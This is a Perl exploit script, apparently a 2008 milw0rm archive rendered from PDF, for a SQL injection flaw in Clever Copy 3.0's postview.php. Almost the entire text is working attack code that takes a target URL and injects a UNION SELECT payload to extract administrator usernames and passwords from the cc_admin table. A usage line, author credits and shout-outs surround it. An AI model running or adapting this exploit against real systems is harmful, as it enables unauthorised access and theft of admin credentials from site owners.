Clever Copy 3.0 postview.php Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 # Clever Copy ’postview.php’ SQL Injection Vulnerable Exploit Coded 3 # By U238 | Web − Designer Solutions Developer 4 # Thank you joss 5 # My Friends : ka0x − Marco Almeida − The_BekiR − fahn − Teyfik Cevik − Nettoxic − Caborz 6 # http://noexec.blogspot.com 7 8 9 print "\n\n0x0x0x0x0x0x0x0xx0x0x0x0x0x0x0x0x0x0x0x00x0x0x0x0x0x0x0xx0x\n\n"; 10 print "\n\n# Clever Copy ’postview.php’ SQL Injection Vulnerability #\n\n"; 11 print "\n\n# This Bug Discovered By U28 in Exploit Completed #\n\n"; 12 print "\n\n0x0x0x0x0x0x0x0xx0x0x0x0x0x0x0x0x0x0x0x00x0x0x0x0x0x0x0xx0x\n\n"; 13 14 use strict; 15 use LWP::UserAgent; 16 17 my $victim = $ARGV[0]; 18 19 if(!$ARGV[0]) { 20 print "\n[x] Exploit Options\n"; 21 print "[x] U238 : setuid.noexec0x1[−]hotmail[+]com\n"; 22 print "[x] usage: perl examp.pl (domain)\n"; 23 print "[x] examp: http://target/path/\n\n"; 24 print "[x] Referance:http://www.securityfocus.com/bid/28437/info\n\n"; 25 exit(1); 26 } 27 sleep(3); 28 sleep(1); 29 print "\n[+] Baglanildi $victim...\n"; 30 my $cnx = LWP::UserAgent−>new() or die; 31 my $go=$cnx−>get($victim."/postview.php?ID=’+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653A DA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*"); 32 if ($go−>content =~ m/____(.*?)____/ms) { 33 print "$1\n"; 34 } else { 35 print "\n[−] exploit calismadi\n"; 36 } 37 38 # milw0rm.com [2008−04−26] Page 1/1 Clever Copy 3.0 postview.php Remote SQL Injection Exploit U238 04/26/2008